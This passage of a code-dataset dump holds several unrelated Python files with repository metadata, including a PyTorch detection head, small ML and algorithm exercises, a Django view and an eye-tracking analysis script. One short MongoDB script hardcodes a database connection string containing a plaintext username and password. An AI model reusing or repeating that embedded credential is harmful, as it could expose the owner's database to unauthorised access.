= 1.0\r\n\r\n        return (grid_cells, labels, label_weights, bbox_targets, bbox_weights,\r\n                pos_inds, neg_inds)\r\n\r\n    def sample(self, assign_result, gt_bboxes):\r\n        pos_inds = torch.nonzero(\r\n            assign_result.gt_inds > 0, as_tuple=False).squeeze(-1).unique()\r\n        neg_inds = torch.nonzero(\r\n            assign_result.gt_inds == 0, as_tuple=False).squeeze(-1).unique()\r\n        pos_assigned_gt_inds = assign_result.gt_inds[pos_inds] - 1\r\n\r\n        if gt_bboxes.numel() == 0:\r\n            # hack for index error case\r\n            assert pos_assigned_gt_inds.numel() == 0\r\n            pos_gt_bboxes = torch.empty_like(gt_bboxes).view(-1, 4)\r\n        else:\r\n            if len(gt_bboxes.shape) < 2:\r\n                gt_bboxes = gt_bboxes.view(-1, 4)\r\n            pos_gt_bboxes = gt_bboxes[pos_assigned_gt_inds, :]\r\n        return pos_inds, neg_inds, pos_gt_bboxes, pos_assigned_gt_inds\r\n\r\n    def post_process(self, preds, imgs):\r\n        cls_scores, bbox_preds = preds\r\n        result_list = self.get_bboxes(cls_scores, bbox_preds, imgs)\r\n        return result_list\r\n\r\n    def get_bboxes(self,\r\n                   cls_scores,\r\n                   bbox_preds,\r\n                   imgs,\r\n                   rescale=False):\r\n\r\n        assert len(cls_scores) == len(bbox_preds)\r\n        num_levels = len(cls_scores)\r\n        device = cls_scores[0].device\r\n\r\n        input_height, input_width = imgs.shape[2:]\r\n        input_shape = [input_height, input_width]\r\n\r\n        result_list = []\r\n        for img_id in range(cls_scores[0].shape[0]):\r\n            cls_score_list = [\r\n                cls_scores[i][img_id].detach() for i in range(num_levels)\r\n            ]\r\n            bbox_pred_list = [\r\n                bbox_preds[i][img_id].detach() for i in range(num_levels)\r\n            ]\r\n            scale_factor = 1\r\n            dets = self.get_bboxes_single(cls_score_list, bbox_pred_list,\r\n                                          input_shape, scale_factor,\r\n                                          device, rescale)\r\n\r\n            result_list.append(dets)\r\n        return result_list\r\n\r\n    def get_bboxes_single(self,\r\n                          cls_scores,\r\n                          bbox_preds,\r\n                          img_shape,\r\n                          scale_factor,\r\n                          device,\r\n                          rescale=False):\r\n        \"\"\"\r\n        Decode output tensors to bboxes on one image.\r\n        :param cls_scores: classification prediction tensors of all stages\r\n        :param bbox_preds: regression prediction tensors of all stages\r\n        :param img_shape: shape of input image\r\n        :param scale_factor: scale factor of boxes\r\n        :param device: device of the tensor\r\n        :return: predict boxes and labels\r\n        \"\"\"\r\n        assert len(cls_scores) == len(bbox_preds)\r\n        mlvl_bboxes = []\r\n        mlvl_scores = []\r\n        for stride, cls_score, bbox_pred in zip(\r\n                self.strides, cls_scores, bbox_preds):\r\n            assert cls_score.size()[-2:] == bbox_pred.size()[-2:]\r\n            featmap_size = cls_score.size()[-2:]\r\n            y, x = self.get_single_level_center_point(\r\n                featmap_size, stride, cls_score.dtype, device, flatten=True)\r\n            center_points = torch.stack([x, y], dim=-1)\r\n            scores = cls_score.permute(1, 2, 0).reshape(\r\n                -1, self.cls_out_channels).sigmoid()\r\n            bbox_pred = 
bbox_pred.permute(1, 2, 0)\r\n bbox_pred = self.distribution_project(bbox_pred) * stride\r\n\r\n nms_pre = 1000\r\n if scores.shape[0] > nms_pre:\r\n max_scores, _ = scores.max(dim=1)\r\n _, topk_inds = max_scores.topk(nms_pre)\r\n center_points = center_points[topk_inds, :]\r\n bbox_pred = bbox_pred[topk_inds, :]\r\n scores = scores[topk_inds, :]\r\n\r\n bboxes = distance2bbox(center_points, bbox_pred,\r\n max_shape=img_shape)\r\n mlvl_bboxes.append(bboxes)\r\n mlvl_scores.append(scores)\r\n\r\n mlvl_bboxes = torch.cat(mlvl_bboxes)\r\n if rescale:\r\n mlvl_bboxes /= mlvl_bboxes.new_tensor(scale_factor)\r\n\r\n mlvl_scores = torch.cat(mlvl_scores)\r\n # add a dummy background class at the end of all labels, same with mmdetection2.0\r\n padding = mlvl_scores.new_zeros(mlvl_scores.shape[0], 1)\r\n mlvl_scores = torch.cat([mlvl_scores, padding], dim=1)\r\n\r\n det_bboxes, det_labels = multiclass_nms(\r\n mlvl_bboxes,\r\n mlvl_scores,\r\n score_thr=0.05,\r\n nms_cfg=dict(type='nms', iou_threshold=0.6),\r\n max_num=100)\r\n return det_bboxes, det_labels\r\n\r\n def get_single_level_center_point(self, featmap_size, stride, dtype, device='cuda', flatten=True):\r\n \"\"\"\r\n Generate pixel centers of a single stage feature map.\r\n :param featmap_size: height and width of the feature map\r\n :param stride: down sample stride of the feature map\r\n :param dtype: data type of the tensors\r\n :param device: device of the tensors\r\n :param flatten: flatten the x and y tensors\r\n :return: y and x of the center points\r\n \"\"\"\r\n h, w = featmap_size\r\n x_range = (torch.arange(w, dtype=dtype, device=device) + 0.5) * stride\r\n y_range = (torch.arange(h, dtype=dtype, device=device) + 0.5) * stride\r\n y, x = torch.meshgrid(y_range, x_range, indexing='ij')\r\n if flatten:\r\n y = y.flatten()\r\n x = x.flatten()\r\n return y, x\r\n\r\n def get_grid_cells(self, featmap_size, scale, stride, dtype, device='cuda'):\r\n \"\"\"\r\n Generate grid cells of a feature map for target assignment.\r\n :param featmap_size: Size of a single level feature map.\r\n :param scale: Grid cell scale.\r\n :param stride: Down sample stride of the feature map.\r\n :param dtype: Data type of the tensors.\r\n :param device: Device of the tensors.\r\n :return: Grid_cells xyxy position. 
Size should be [feat_w * feat_h, 4]\r\n \"\"\"\r\n cell_size = stride * scale\r\n y, x = self.get_single_level_center_point(\r\n featmap_size, stride, dtype, device, flatten=True)\r\n grid_cells = torch.stack(\r\n [x - 0.5 * cell_size, y - 0.5 * cell_size,\r\n x + 0.5 * cell_size, y + 0.5 * cell_size], dim=-1\r\n )\r\n return grid_cells\r\n\r\n def grid_cells_to_center(self, grid_cells):\r\n \"\"\"\r\n Get center location of each gird cell\r\n :param grid_cells: grid cells of a feature map\r\n :return: center points\r\n \"\"\"\r\n cells_cx = (grid_cells[:, 2] + grid_cells[:, 0]) / 2\r\n cells_cy = (grid_cells[:, 3] + grid_cells[:, 1]) / 2\r\n return torch.stack([cells_cx, cells_cy], dim=-1)","repo_name":"shanglianlm0525/CvPytorch","sub_path":"src/models/heads/gfl_head.py","file_name":"gfl_head.py","file_ext":"py","file_size_in_byte":27559,"program_lang":"python","lang":"en","doc_type":"code","stars":183,"dataset":"github-code","pt":"60"} +{"seq_id":"34616123901","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.metrics import r2_score # R-Square\n\n\ndf = pd.read_csv(\"data/salarys.csv\")\n\n\nx = df.iloc[:,1:2] # DataFrame\ny = df.iloc[:,2:]\nXn = x.values # Numpy array\nYn = y.values\n\n\n# SVR\n# Support Vector Regression | SVR | svr da scaling edilmesi mecbur. hassas bu konuda krdşimiz.\nfrom sklearn.preprocessing import StandardScaler\nsc1 = StandardScaler()\nx_scale = sc1.fit_transform(Xn)\nsc2 = StandardScaler()\ny_scale = np.ravel(sc2.fit_transform(Yn.reshape(-1,1)))\n\nfrom sklearn.svm import SVR\nsvr = SVR(kernel=\"rbf\") # Radial Based Function | rbf\nsvr.fit(x_scale, y_scale) # iki değer arasında bağlantı kurulması\n\nsvrPredict = svr.predict(x_scale)\nplt.scatter(x_scale, y_scale, color=\"red\")\nplt.plot(x_scale, svrPredict) # Her bir x değeri için tahminde bulun\nplt.show()\n\n\n# SVR ile tahmin etme | ölçeklenmeden dolayı düşük sayılar çıkıyor\nprint(svr.predict([[11]]))\nprint(svr.predict([[6.6]]))\n\n\n\n# R2\n# Scaling yaptığımız için boyutu indirmemiz gerek\nprint(\"SVR - R2\".center(50, \"-\"))\nprint(r2_score(y_scale, svr.predict(x_scale)))","repo_name":"mucahitcakmak/Python-MachineLearningAlgorithms","sub_path":"1-Prediction/5-SVR.py","file_name":"5-SVR.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6268761332","text":"#https://leetcode.com/problems/to-lower-case/\n#Complexity: O(n)\n\nclass Solution:\n def toLowerCase(self, str: str) -> str:\n lenString=len(str)\n i=0\n for i in range(lenString):\n ordI=ord(str[i])\n if ordI>=65 and ordI<=90:\n str=str[:i]+chr(32+ordI)+str[i+1:]\n i+=1\n return str\n","repo_name":"aasthaagrawal/Algorithms_and_Data_Structures","sub_path":"leetcode/709_To_Lower_Case.py","file_name":"709_To_Lower_Case.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"3403082888","text":"\nfrom pymongo.mongo_client import MongoClient\nuri = \"mongodb+srv://satyammarkam123:jacob@cluster0.fh8hexa.mongodb.net/?retryWrites=true&w=majority\"\n\n# Create a new client and connect to the server\nclient = MongoClient(uri)\n\n# Send a ping to confirm a successful connection\ndb = client['sample-db']\ncollection = db['sample']\ncar={\n 'id': 2,\n 'name': 'value2',\n 'class':'10nth'\n}\nresult = 
collection.insert_one(car) \nprint(result)\n\n","repo_name":"Satyam20091998/Spark-Kafka-MongoDB","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"40810158330","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n\tlong_description = fh.read()\n\nsetuptools.setup(\n\tname=\"pyDatahubDriver\",\n\tversion=\"0.1.1b\",\n\tauthor=\"King Abdullah Petroleum Studies and Research Center\",\n\tauthor_email=\"anup.kumar@kapsarc.org\",\n\tdescription=\"KAPSARC Datahub\",\n    keywords=\"model-data data-version modelers-data-version python jupyter ipython\",\n    install_requires=[\n        \"pandas\",\n        \"requests\"\n    ],\n\tlong_description=long_description,\n\tlong_description_content_type=\"text/markdown\",\n\t# url=\"https://github.com/kapsarc/pyDatahub\",\n\tpackages=['datahub'],\n\tpackage_dir={'datahub': 'datahub'},\n\tclassifiers=[\n\t\t'Development Status :: 2 - Pre-Alpha',\n        \"Programming Language :: Python :: 3\",\n        \"Programming Language :: Python :: 3.5\",\n        \"Programming Language :: Python :: 3.6\",\n        \"Programming Language :: Python :: 3.7\",\n\t\t\"License :: OSI Approved :: MIT License\",\n\t\t\"Operating System :: OS Independent\",\n        \"Intended Audience :: Science/Research\",\n        \"Intended Audience :: Developers\",\n        \"Intended Audience :: Financial and Insurance Industry\",\n        \"Intended Audience :: Healthcare Industry\"\n\t]\n)","repo_name":"saianupkumarp/pyDatahub","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"32178440595","text":"import logging\nfrom shutil import copyfile\n\nimport inquirer\nfrom inquirer.themes import load_theme_from_dict\nfrom modules.compiler.build import make_build\nfrom modules.compiler.clean import make_clean\nfrom modules.compiler.defconfig import make_defconfig\nfrom modules.compiler.menuconfig import make_menuconfig\nfrom modules.inquirer.save import app_save_config\nfrom modules.manager.cmd import run_command\nfrom modules.manager.json import dump_json_file\nfrom modules.obtainer.compiler import get_compiler_path\nfrom modules.zipper.config import config_anykernel\nfrom modules.zipper.makezip import copy_to_anykernel, make_flashable_zip\nfrom modules.zipper.signer import zip_signer\n\n\ndef run_session(self):\n    \"\"\"Application `main session`\n\n    Actions\n    -------\n    1) \"Make clean and mrproper\"\n    2) \"Make defconfig\"\n    3) \"Make menuconfig\"\n    4) \"Make build\"\n    5) \"Make zip\"\n    6) \"Sign zip\"\n    \"\"\"\n    # Make clean/mrproper\n    if self.session['answers']['cleanbuild'] is True:\n        make_clean(self)\n\n    # Make defconfig\n    if self.session['mode'] in ['newbuild', 'menuconfig']:\n        make_defconfig(self)\n\n    # Make menuconfig\n    if self.session['answers']['menuconfig'] is True:\n        make_menuconfig(self)\n\n    # Save new defconfig?\n    save_config = inquirer.prompt(\n        app_save_config(self),\n        theme=load_theme_from_dict(self.theme)\n    )\n    if save_config['save'] is True:\n\n        run_command(\n            'cp {kernel}/.config {path}/{config}'.format(\n                kernel=self.session['out_folder'],\n                config=save_config['defconfig_name'],\n                path=self.session['defconfig_folder']\n            ),\n            exit_on_error=True\n        )\n        logging.info(self.trad('successfully saved'))\n\n    # Make build\n    if self.session['mode'] == 'newbuild':\n        self.session['compiler_path'] = get_compiler_path(self)\n        make_build(self)\n        
config_anykernel(self)\n copy_to_anykernel(self)\n make_flashable_zip(self)\n zip_signer(self)\n\n # Copy logs\n logging.info(self.trad('saving build logs to android/logs...'))\n dump_json_file(\n self.session,\n '{codename}-{date}.json'.format(\n codename=self.session['device_codename'],\n date=self.session['datetime']\n )\n )\n copyfile(\n 'zmb.log',\n 'android/logs/{codename}-{date}.log'.format(\n codename=self.session['device_codename'],\n date=self.session['datetime']\n )\n )\n\n # Make Zip\n elif self.session['mode'] == 'makezip':\n copy_to_anykernel(self)\n config_anykernel(self)\n make_flashable_zip(self)\n\n # Zip Signer\n elif self.session['mode'] == 'zipsigner':\n self.session['build_name'] = self.session['answers']['zipsigner']\n zip_signer(self)\n","repo_name":"grm34/PyZenMaxBuilder","sub_path":"modules/session/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"43655137388","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@Description: 使用到的工具。比如感知机要求类别为-1和1,所以要将0类改成-1类。\n@Time : 2021-3-7 15:26 \n@File : utils.py \n@Software: PyCharm\n\"\"\"\nfrom sklearn import datasets\nfrom sklearn import model_selection\nimport numpy as np\nimport random\n\n\ndef setup_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n\n\ndef relabel(origin_y):\n y_temp = origin_y - 1\n final_y = y_temp + origin_y\n return final_y\n\n\ndef dataloader(ratio=0.9): # ratio trainset:allset\n breast_cancer_data = datasets.load_breast_cancer()\n features = breast_cancer_data.data # 特征\n targets = breast_cancer_data.target # 类别\n assert len(set(targets)) == 2, \"目前我们只解决二分类问题\"\n assert targets.max() == 1, \"应该至少保证有一类为1\"\n if targets.min() == 0:\n targets = relabel(targets)\n x_train, x_test, y_train, y_test = model_selection.train_test_split(features, targets, train_size=ratio)\n return x_train, x_test, y_train, y_test","repo_name":"Spirefall/MechineLearningClassProject","sub_path":"perceptron/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"38530095584","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\n\ngood_job = True\nnumbers = list()\n\nn = int(input())\n\nfor i in range(1,n+1):\n numbers.append(int(input()))\n\nfor j in range(1,numbers[-1]):\n if j not in numbers:\n print(j)\n good_job = False\n\nif good_job:\n print(\"good job\")\n","repo_name":"shakenn0tstirred/kattis","sub_path":"missingnumbers.py","file_name":"missingnumbers.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"72084219072","text":"import coupons.forms\nimport coupons.models\n\nimport django.http\nimport django.shortcuts\nimport django.utils.timezone\nimport django.views.generic\n\n\nclass CouponActivateView(django.views.generic.View):\n \"\"\"активируем купон\"\"\"\n\n def post(\n self, request: django.http.HttpRequest\n ) -> django.http.HttpResponse:\n \"\"\"получаем купон по коду и текущему времени\"\"\"\n now_time = django.utils.timezone.now()\n form = coupons.forms.CouponActivateForm(request.POST)\n if form.is_valid():\n code = form.cleaned_data['code']\n coupon = coupons.models.Coupon.objects.filter(\n code__iexact=code,\n is_active=True,\n valid_since__lte=now_time,\n valid_to__gte=now_time,\n ).first()\n request.session['coupon_id'] = coupon.pk if coupon else None\n return django.shortcuts.redirect('cart:detail')\n","repo_name":"fivan999/online_shop","sub_path":"online_shop/coupons/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37214478362","text":"\"\"\"\n统计数据集中轨迹点数据采集的时间间隔\n\"\"\"\n\nimport sys\n\nif sys.platform == 'linux':\n sys.path.append('/root/trajectory_handle/')\nfrom ast import literal_eval\nfrom datetime import datetime\nimport numpy as np\nfrom trajectory.cal_distance import haversine\n\n\nlinux_path = \"/root/taxiData\"\nwindows_path = \"H:/TaxiData\"\nbase_path = windows_path + \"/trajectory_without_filter/\"\n\nfile_path1 = \"2014-10-20\"\nfile_path2 = \"2014-10-21\"\nfile_path3 = \"2014-10-22\"\nfile_path4 = \"2014-10-23\"\nfile_path5 = \"2014-10-24\"\nfile_path6 = \"2014-10-25\"\nfile_path7 = \"2014-10-26\"\n\n# file_paths = [file_path1, file_path2, file_path3, file_path4, file_path5, file_path6, file_path7]\nfile_paths = [file_path5]\nfor file_path in file_paths:\n youke = base_path + file_path + \"/trajectory_\" + file_path + \".npy\"\n\n youke_times = []\n\n youke_trajectories = np.load(youke).tolist()\n for trajectory in youke_trajectories:\n youke_times.append((datetime.strptime(str(trajectory[-1][3]), \"%Y-%m-%d %H:%M:%S\") -\n datetime.strptime(str(trajectory[0][3]), \"%Y-%m-%d %H:%M:%S\")).seconds)\n\n print(\"day: {}, youke_avg time: {}\".format(file_path, sum(youke_times) / len(youke_times)))","repo_name":"haocdp/trajectory_handle","sub_path":"paper/get_avg_tra_len.py","file_name":"get_avg_tra_len.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"785952391","text":"import os\nimport urllib\n\nfrom configs import configure_manager\nfrom input_adapters import AVL_INPUT_ADAPTERS\nfrom plots import CandlestickPlot\nfrom exceptions import InputStringException\nfrom indicators import Ema\n\n\ndef match_input(input: str):\n \"\"\"Searches for a matching adapter for the input data\"\"\"\n if urllib.parse.urlparse(input).scheme:\n raise 
InputStringException('Data download links are not supported yet')\n\n if not os.path.isfile(input):\n raise InputStringException('The file was not found at the specified path')\n\n file_extension = os.path.splitext(input)[-1]\n for input_adapter in AVL_INPUT_ADAPTERS:\n if file_extension == input_adapter.FILE_EXTENSION:\n return input_adapter(file_path=input)\n raise InputStringException(\n f'{input} is not supported, specify'\n f' a file with a valid extension '\n f'{[adapter.FILE_EXTENSION for adapter in AVL_INPUT_ADAPTERS]}'\n f' or a link to download the data.'\n )\n\n\ndef main():\n \"\"\"Main function of the project\"\"\"\n plot_manager = configure_manager()\n args = plot_manager.parse_args()\n\n input_adapter = match_input(input=args.input)\n plot_data = input_adapter.get_dataframe(interval_minutes=args.interval_minutes)\n\n indicators = []\n if args.ema:\n indicators.append(Ema(plot_data=plot_data, period=args.ema))\n\n CandlestickPlot(plot_data=plot_data, indicators=indicators).show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Todvaa/test_task_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28095246645","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"d0ana\")\n\n\n# initialize MessageLogger and output report\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\n#process.MessageLogger.cerr.threshold = 'INFO'\n#process.MessageLogger.categories.append('Demo')\n#process.MessageLogger.cerr.INFO = cms.untracked.PSet(\n# limit = cms.untracked.int32(-1)\n# )\nprocess.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(1000)\nprocess.options = cms.untracked.PSet( wantSummary =\ncms.untracked.bool(True) )\nprocess.options.numberOfThreads = cms.untracked.uint32(8)\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1)\n)\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring('/store/user/anstahll/MTD/VertexCompositeAnalysis/HydJets_mc_mtd_D0_ANASKIM_20190308/MinBias_Hydjet_Drume5_5p5TeV_TuneCP5_Pythia8/HydJets_mc_mtd_D0_ANASKIM_20190308/190308_101848/0000/hyjets_d0_101.root'),\n )\nprocess.load(\"VertexCompositeAnalysis.VertexCompositeAnalyzer.d0selector_cff\")\nprocess.load(\"VertexCompositeAnalysis.VertexCompositeAnalyzer.d0analyzer_ntp_cff\")\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string('hyjets_mc_mtd_d0.root')\n )\n\nprocess.d0ana_mc.isUseMtd = cms.untracked.bool(True);\nprocess.d0ana_mc.doRecoNtuple = cms.untracked.bool(True)\nprocess.d0ana_mc.doGenNtuple = cms.untracked.bool(True)\nprocess.d0ana_mc.doGenMatching = cms.untracked.bool(False)\nprocess.d0ana_mc.VertexCollection = cms.untracked.InputTag(\"offlinePrimaryVertices4D\")\nprocess.d0ana_mc.VertexCompositeCollection = cms.untracked.InputTag(\"d0selectorMC:D0\")\nprocess.d0ana_mc.MVACollection = cms.InputTag(\"d0selectorMC:MVAValuesNewD0\")\nprocess.d0ana_mc.isCentrality = cms.bool(True)\n\nprocess.d0selectorMC.VertexCollection = cms.untracked.InputTag(\"offlinePrimaryVertices4D\")\n\nprocess.d0ana_seq = cms.Sequence(process.d0selectorMC * process.d0ana_mc)\n\nprocess.p = 
cms.Path(process.d0ana_seq)\n","repo_name":"yszhang95/MTDStudies","sub_path":"DOE20210402/configs/Reproduction/HyJets_PhaseIIMTD_D0_mc_ntuple.py","file_name":"HyJets_PhaseIIMTD_D0_mc_ntuple.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"31564066048","text":"import unittest\nimport logging\nimport os.path\nimport os\n\nfrom .audio_opt import AudioProcessor, SilenceAudioSegment\nfrom .probe import AVProp\n\n\nclass SilenceAudioSegmentTest(unittest.TestCase):\n    def test_gen_slient_audio(self):\n        audio_path = \"test.mp3\"\n        SilenceAudioSegment.silent(duration=5000 * 2).export(audio_path)\n        prob = AVProp(audio_path)\n        logging.debug(f\"duration: {prob.fmt_duration_sec()}\")\n        self.assertTrue(os.path.getsize(audio_path) > 0)\n        self.assertTrue(prob.fmt_duration_sec() > 4)\n        os.remove(audio_path)\n\n\nclass AudioProcessorTest(unittest.TestCase):\n    def test_convert(self):\n        audio_path = \"test.mp3\"\n        SilenceAudioSegment.silent(duration=5000 * 2).export(audio_path)\n        prob = AVProp(audio_path)\n        logging.debug(f\"duration: {prob.fmt_duration_sec()}\")\n        self.assertTrue(os.path.getsize(audio_path) > 0)\n        self.assertTrue(prob.fmt_duration_sec() > 4)\n\n        wav_file_path = \"test.wav\"\n        AudioProcessor.convert_2_wav(audio_path, wav_file_path)\n        prob_wav = AVProp(wav_file_path)\n        logging.debug(f\"duration: {prob_wav.fmt_duration_sec()}, {prob_wav.audio_ext}\")\n        self.assertTrue(os.path.getsize(wav_file_path) > 0)\n        self.assertTrue(prob_wav.fmt_duration_sec() > 4)\n        self.assertTrue(prob_wav.audio_ext == \".wav\")\n\n        mp3_file_path = \"test_new.mp3\"\n        AudioProcessor.convert_2_mp3(wav_file_path, mp3_file_path)\n        prob_mp3 = AVProp(mp3_file_path)\n        logging.debug(f\"duration: {prob_mp3.fmt_duration_sec()}, {prob_mp3.audio_ext}\")\n        self.assertTrue(os.path.getsize(wav_file_path) > 0)\n        self.assertTrue(int(prob_mp3.fmt_duration_sec()) == int(prob.fmt_duration_sec()))\n        self.assertTrue(prob_mp3.audio_ext == \".mp3\")\n\n        os.remove(audio_path)\n        os.remove(wav_file_path)\n        os.remove(mp3_file_path)\n\n\n# python3 -m pytest -o log_cli=true -o log_cli_level=DEBUG py_utils/src/av/audio_opt_test.py\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"k9bao/py_utils","sub_path":"src/av/audio_opt_test.py","file_name":"audio_opt_test.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"20710661173","text":"\n# coding: utf-8\n\nimport pandas as pd\nimport matplotlib.ticker as ticker\n\n# In[9]:\n\ndef ImportGazeFile (filename):\n    data = pd.read_csv(filename, sep= \"\\t\")\n    return(data.head())\n\n\n# In[3]:\n\ndef GazeData(AOIOneCoor, AOITwoCoor, xcoor, ycoor, subs, time, stim):\n    \n    import numpy as np\n    import pandas as pd\n    import matplotlib as plt\n    import matplotlib.ticker as ticker\n    get_ipython().magic('matplotlib inline')\n    \n    #the AOI variables expect a list of length 4: xmin, ymin, xmax, ymax\n    AOIOneXmin = AOIOneCoor[0] \n    AOIOneYmin = AOIOneCoor[1] \n    AOIOneXmax = AOIOneCoor[2] \n    AOIOneYmax = AOIOneCoor[3]\n\n    AOITwoXmin = AOITwoCoor[0] \n    AOITwoYmin = AOITwoCoor[1] \n    AOITwoXmax = AOITwoCoor[2] \n    AOITwoYmax = AOITwoCoor[3] \n\n    #boolean masks flagging gaze samples that fall inside each AOI\n    AOIOne = (xcoor >= AOIOneXmin) & (xcoor <= AOIOneXmax) & (ycoor >= AOIOneYmin) & (ycoor <= AOIOneYmax)\n    AOITwo = (xcoor >= AOITwoXmin) & (xcoor <= AOITwoXmax) & (ycoor >= AOITwoYmin) & (ycoor <= AOITwoYmax)\n\n    trialNum = []\n    trialList = []\n    trialLen = []\n    curstim = []\n    subList = []\n    gazedur1 = []\n    gazedur2 = []\n    for subID in set(subs):\n        #get index of trial changes, based on change in stim name, 'MediaName' variable\n        trials = np.roll(stim[subs == subID],1)!=stim[subs == subID] # onset of change in trial\n        trialsOFF = 
np.roll(stim[subs == subID],-1)!=stim[subs == subID] # offset of change in trial\n trialLen.extend(np.subtract(time[subs == subID][trialsOFF], time[subs == subID][trials]))# build list of trial lengths for output dataframe\n trialNum.extend(trials.cumsum()) #get trial number by increasing trial number each time a new trial onset is found\n trialList.extend(np.unique(trialNum)) # build list of trials by subject for output dataframe\n subList.extend([subID]*len(trialList)) # build list of subjects for output dataframe\n\n for Trial in np.unique(trialNum):\n\n # Get onset/offset of gaze event changes for current subject and trial for AOIOne\n eventON1 = np.roll(AOIOne[subs == subID][trialNum == Trial],1) != AOIOne[subs == subID][trialNum == Trial]\n eventOFF1 = np.roll(AOIOne[subs == subID][trialNum == Trial],-1) != AOIOne[subs == subID][trialNum == Trial]\n\n # Get onset/offset of gaze event changes for current subject and trial for AOITwo\n eventON2 = np.roll(AOITwo[subs == subID][trialNum == Trial],1) != AOITwo[subs == subID][trialNum == Trial]\n eventOFF2 = np.roll(AOITwo[subs == subID][trialNum == Trial],-1) != AOITwo[subs == subID][trialNum == Trial]\n\n curstim.append(np.array(stim[subs == subID][trialNum == Trial])[0]) # build list of stimulus name for output dataframe\n\n # Get the difference between the gaze event onset and offset values in the timestamp, to get the total duration of gaze event, then sum up these events for the trial\n gazedur1.append(np.subtract(time[subs == subID][trialNum == Trial][AOIOne == True][eventOFF1], time[subs == subID][trialNum == Trial][AOIOne == True][eventON1]).sum())\n # Get the difference between the gaze event onset and offset values in the timestamp, to get the total duration of gaze event, then sum up these events for the trial\n gazedur2.append(np.subtract(time[subs == subID][trialNum == Trial][AOITwo == True][eventOFF2], time[subs == subID][trialNum == Trial][AOITwo == True][eventON2]).sum())\n \n # Build data frame from lists created in for loops\n outputDF = pd.DataFrame({'Subject': subList,\n 'Trial': trialList,\n 'TrialDuration_ms': trialLen,\n 'Stimulus': curstim,\n 'AOI_One_ms': gazedur1,\n 'AOI_Two_ms': gazedur2})\n outputDF = outputDF[['Subject','Trial', 'TrialDuration_ms','Stimulus', 'AOI_One_ms', 'AOI_Two_ms']]\n return(outputDF)\n\n\n# In[8]:\n\ndef GazeDataGroup (outputDF, kind):\n if kind == 'stim':\n outputGROUP = outputDF.groupby(by = \"Stimulus\").mean() #get mean looking time to AOIs by stimulus name\n\n elif kind == 'sub':\n outputGROUP = outputDF.groupby(by = \"Subject\").mean() #get mean looking time to AOIs by subject ID\n\n elif kind == 'trial':\n outputGROUP = outputDF.groupby(by = \"Trial\").mean() #get mean looking time to AOIs by trial ID\n \n return(outputGROUP)\n\n\n# In[10]:\n\ndef ExportGazeData (filetitle, outputDF):\n outputDF.to_csv(filetitle + '.csv')\n\n\n# In[14]:\n\ndef PlotTrialProp(outputGROUP, kind):\n if kind == 'stim':\n outputGROUP.AOI1propLook = (outputGROUP.AOI_One_ms/outputGROUP.TrialDuration_ms)\n outputGROUP.AOI2propLook = (outputGROUP.AOI_Two_ms/outputGROUP.TrialDuration_ms)\n ax = outputGROUP.AOI1propLook.plot(color='r', figsize=(30, 10), legend = True, label = 'AOI One')\n outputGROUP.AOI2propLook.plot(color='b', legend = True, label = 'AOI Two')\n tick_spacing = 5\n ax.set_xlabel('Stimulus', fontsize = 20)\n ax.set_ylabel('Proportion of looking to AOI', fontsize = 20)\n ax.xaxis.set_major_locator(ticker.MultipleLocator(tick_spacing))\n ax.tick_params(labelsize=20)\n elif kind == 'trial':\n 
